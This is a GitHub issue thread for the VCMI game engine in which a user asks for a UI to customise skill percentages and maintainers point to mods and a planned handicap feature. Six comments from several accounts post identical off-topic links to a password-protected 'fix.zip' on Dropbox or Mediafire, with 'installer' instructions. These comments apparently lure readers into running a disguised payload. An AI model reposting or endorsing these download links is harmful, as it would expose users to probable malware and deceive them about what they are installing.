### ISSUE TITLE
add customization to percentage in a skill

### ISSUE THREAD

**Issue by jaicmatija** [vcmi/vcmi#4514]
**Describe your proposal**
Me and my friends usually play multiplayer where one player is OP necropolis.
Is there a way to add a UI where you could customize percentage of skill like necromancy? or sorcery? or any other.
Maybe before the game you could set some custom variables, e.g make necromancy OP or weak and in that way users would have different game with uniq exeperince.
Right now this is possible by programming, but is there a way to have the UI form where you could customize all kinds of things?

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dydzio0614** [comment]
this is possible via creating VCMI mods already

**Comment by IvanSavenko** [comment]
Possible via mods. In-game customization of parameters is not planned.

**Comment by jaicmatija** [comment]
> This is possible via creating VCMI mods already, unless you mean different percentage for different players?

Is it possible to create a custom percentage per different player?
maybe to weaken some payers that are more experienced?

In my usecase 1 player is noob at the game and his necormancy would be 100% so he is buffed

**Comment by dydzio0614** [comment]
there is handicap feature coming for VCMI 1.6 for resources/income/growth manipulation, for now there are no plans to go beyond with fancy custom buffs/nerfs per player that do not solve real problem

**Comment by nullkiller** [comment]
Maybe giving your opponent some artifacts which increase necromancy or something. VCMI has some cheat codes
